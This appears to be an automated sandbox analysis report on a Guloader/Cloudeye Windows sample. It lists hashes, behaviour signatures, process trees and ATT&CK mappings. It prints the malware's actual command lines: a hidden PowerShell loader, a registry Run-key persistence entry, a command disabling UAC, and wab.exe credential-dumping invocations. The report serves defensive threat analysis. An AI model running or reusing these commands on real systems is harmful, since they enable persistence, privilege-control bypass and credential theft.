Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10-07-2024 01:26
Static task
static1
Behavioral task
behavioral1
Sample
4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe
Resource
win10v2004-20240709-en
General
-
Target
4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe
-
Size
398KB
-
MD5
b1c35e78f5d588430c4f534479def9f2
-
SHA1
f787dd3327ca04361935f74867f76f16821db99f
-
SHA256
4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7
-
SHA512
5f78e6794ae313f5ca96c33fe0ecf0c882a18a93caa54bf92823ac42c5c753b6a98d4c77618de2b62cbc9d24e6e500272e4ffa7b25afff20b7e8349fc278a66c
-
SSDEEP
12288:9GkmNVhJhqnfP30YhNia+nv4tQD3W/P19QY:9GkmPh7qfPrsQeD3W/bd
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral2/memory/2516-72-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral2/memory/1908-69-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Nirsoft 3 IoCs
Processes:
resource yara_rule behavioral2/memory/1940-73-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/2516-72-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/1908-69-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
Processes:
wab.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts wab.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2636447293-1148739154-93880854-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Ortyginae = "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\\Audiometeret\\').Rudolph;%Monopolizables% ($masturbated)" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
Processes:
wab.exepid process 2696 wab.exe 2696 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2104 powershell.exe 2696 wab.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
powershell.exewab.exedescription pid process target process PID 2104 set thread context of 2696 2104 powershell.exe wab.exe PID 2696 set thread context of 1908 2696 wab.exe wab.exe PID 2696 set thread context of 2516 2696 wab.exe wab.exe PID 2696 set thread context of 1940 2696 wab.exe wab.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exewab.exewab.exepid process 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 2104 powershell.exe 1908 wab.exe 1908 wab.exe 1940 wab.exe 1940 wab.exe 1908 wab.exe 1908 wab.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
Processes:
powershell.exewab.exepid process 2104 powershell.exe 2696 wab.exe 2696 wab.exe 2696 wab.exe 2696 wab.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 2104 powershell.exe Token: SeDebugPrivilege 1940 wab.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
wab.exepid process 2696 wab.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exepowershell.exewab.execmd.execmd.exedescription pid process target process PID 5116 wrote to memory of 2104 5116 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe powershell.exe PID 5116 wrote to memory of 2104 5116 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe powershell.exe PID 5116 wrote to memory of 2104 5116 4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe powershell.exe PID 2104 wrote to memory of 2696 2104 powershell.exe wab.exe PID 2104 wrote to memory of 2696 2104 powershell.exe wab.exe PID 2104 wrote to memory of 2696 2104 powershell.exe wab.exe PID 2104 wrote to memory of 2696 2104 powershell.exe wab.exe PID 2104 wrote to memory of 2696 2104 powershell.exe wab.exe PID 2696 wrote to memory of 2348 2696 wab.exe cmd.exe PID 2696 wrote to memory of 2348 2696 wab.exe cmd.exe PID 2696 wrote to memory of 2348 2696 wab.exe cmd.exe PID 2348 wrote to memory of 1520 2348 cmd.exe reg.exe PID 2348 wrote to memory of 1520 2348 cmd.exe reg.exe PID 2348 wrote to memory of 1520 2348 cmd.exe reg.exe PID 2696 wrote to memory of 3708 2696 wab.exe cmd.exe PID 2696 wrote to memory of 3708 2696 wab.exe cmd.exe PID 2696 wrote to memory of 3708 2696 wab.exe cmd.exe PID 3708 wrote to memory of 1980 3708 cmd.exe reg.exe PID 3708 wrote to memory of 1980 3708 cmd.exe reg.exe PID 3708 wrote to memory of 1980 3708 cmd.exe reg.exe PID 2696 wrote to memory of 1908 2696 wab.exe wab.exe PID 2696 wrote to memory of 1908 2696 wab.exe wab.exe PID 2696 wrote to memory of 1908 2696 wab.exe wab.exe PID 2696 wrote to memory of 1908 2696 wab.exe wab.exe PID 2696 wrote to memory of 2516 2696 wab.exe wab.exe PID 2696 wrote to memory of 2516 2696 wab.exe wab.exe PID 2696 wrote to memory of 2516 2696 wab.exe wab.exe PID 2696 wrote to memory of 2516 2696 wab.exe wab.exe PID 2696 wrote to memory of 2624 2696 wab.exe wab.exe PID 2696 wrote to memory of 2624 2696 wab.exe wab.exe PID 2696 wrote to memory of 2624 2696 wab.exe wab.exe PID 2696 wrote to memory of 1940 2696 wab.exe wab.exe PID 2696 wrote to memory of 1940 2696 wab.exe wab.exe PID 2696 wrote to memory of 1940 2696 wab.exe wab.exe PID 2696 wrote to memory of 1940 2696 wab.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe"C:\Users\Admin\AppData\Local\Temp\4412e46cdfffa346ea1d4e07b30077ccaa09fe1cbbe6f9965df193f2e063f4b7.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:5116 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Vangede=Get-Content 'C:\Users\Admin\AppData\Roaming\annekskirkers\dommedagens\nonmenial\Reexpression.Tid';$Spondylotomy=$Vangede.SubString(70479,3);.$Spondylotomy($Vangede)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2104 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"4⤵
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Ortyginae" /t REG_EXPAND_SZ /d "%Monopolizables% -windowstyle minimized $masturbated=(Get-ItemProperty -Path 'HKCU:\Audiometeret\').Rudolph;%Monopolizables% ($masturbated)"5⤵
- Adds Run key to start application
- Modifies registry key
PID:1520 -
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- Suspicious use of WriteProcessMemory
PID:3708 -
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- UAC bypass
- Modifies registry key
PID:1980 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\giryqlua"4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1908 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jkfrrefcneq"4⤵
- Accesses Microsoft Outlook accounts
PID:2516 -
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tekbrwqvjmibira"4⤵PID:2624
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tekbrwqvjmibira"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5c7e24dbdc905b3ffe386e15f483fa702
SHA13a2455c25ef8cf2ece8108773f58eab16e392168
SHA256395b65e62c584ba3243c7697b4a23acaccea886306cbe7b130aa1a17071c0ab9
SHA51251ca989f7df911cabcbda1860d62164bb6d015cbd555e9cab5adb4ee0ea22c4868c0d8dbf2c71e86723d12fb3b02b9eeeaebb9f369f9b564c1bc77356e68cc1f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD5982ebb238759653970e22ee9fad24470
SHA115fca6be8cc4a276c9f70a73f28c52c3b0eead15
SHA256c8b9cad5602932ea51b923f39f4b2d9aedf1f4915880d89032ab6636acaf9bea
SHA512c8777edf0dd3e72e0cf3bb89db2bc7856fed0eeca7199806fec341e9168899e3b700c73a6b2e7cb0e8ccc5523116d6ecfde5c9ebcc83288a162dd1b0ea78201b
-
Filesize
344KB
MD51a78d0f226d0db154812e61b8cadb4b8
SHA1e76650e32ed8bc1e3d72dde1aa6566ff031e0c6e
SHA25619997e372b58bcd5bacd8b199b1633307f0c89fc3ce7abfd4087ec739742f78e
SHA512b06759e8bfeb73187c5277aaaa9c6489f51a88f42b461ec0775de6741f6b797dc3c2cbb8f6cf79815078a420a26cde9cedd861c4d16ac73a037e2160efc4ec41
-
Filesize
68KB
MD5d89dac6d6bcfb431c31bdf7d21f48fbd
SHA12f55f2b77da6a9078c7bb90fd87b205c9c4cf3b9
SHA256ffeacf6c0a98133600a0f1de25732fb4b22b06af6921edd316e52a6d7837359b
SHA51276eb9025c18fd7661cb72d47c7eda57a45304594e5aea32fe73b1dd94ec9db81753726f83e6d9f82924c3b9295eef4725dbaa7d633963ac8e8e91b7444346070